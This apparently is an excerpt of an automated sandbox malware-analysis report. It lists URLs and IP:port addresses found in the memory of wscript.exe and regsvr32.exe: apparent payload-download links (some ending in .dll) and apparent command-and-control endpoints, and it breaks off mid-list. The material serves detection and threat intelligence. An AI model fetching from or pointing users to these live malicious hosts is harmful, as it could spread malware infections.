Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ozmeydan.com/cekici/9/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ozmeydan.com/cekici/9/xM
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
Source: wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405065761.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0
Source: wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
Source: regsvr32.exe, 00000004.00000003.631557827.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632847163.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633400839.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631327134.0000000002CEE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/Low
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/~
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://163.44.196.120:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://163.44.196.120:8080/a
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631367209.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.633048018.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631876075.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://167.172.199.165:8080/
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632920249.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631988721.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://167.172.199.165:8080/&C
Source: regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://91.121.146.47:8080/
Source: regsvr32.exe, 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/
Source: regsvr32.exe, 00000004.00000003.487960749.0000000000C32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D
Source: wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreem
Source: wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
Source: wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404821142.0000000005952000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404992491.0000000005963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
Source: wscript.exe, 00000001.00000003.406246546.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410615490.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407565832.0000000005A30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/
Source: wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406246546.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401168303.000000000583C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396577821.00000000054FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407228406.00000000058EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.00000000055A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405042674.0000000005982000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396577821.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398739448.000000000565D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410425286.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396205174.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399332103.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.000000000555C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403345800.0000000005872000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408199396.00000000058D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398390395.0000000005657000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400913529.0000000005747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410280537.0000000005950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404790346.0000000005948000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/:
Source: wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404449141.0000000005925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402904454.00000000058C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402574325.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410244672.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404512277.000000000592E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.403395898.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407529090.0000000005935000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404263538.000000000591E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/o8
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/admin/Ses8712iGR8du/tM
Source: wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org/l
Source: wscript.exe, 00000001.00000003.402475133.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400788663.000000000579C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407340344.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400134477.000000000578F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410176133.00000000057BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400415831.0000000005797000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400837362.00000000057AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject(
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/
Source: wscript.exe, 00000001.00000003.404701229.0000000005980000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404904476.000000000598C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C:
Source: wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM
Source: wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, 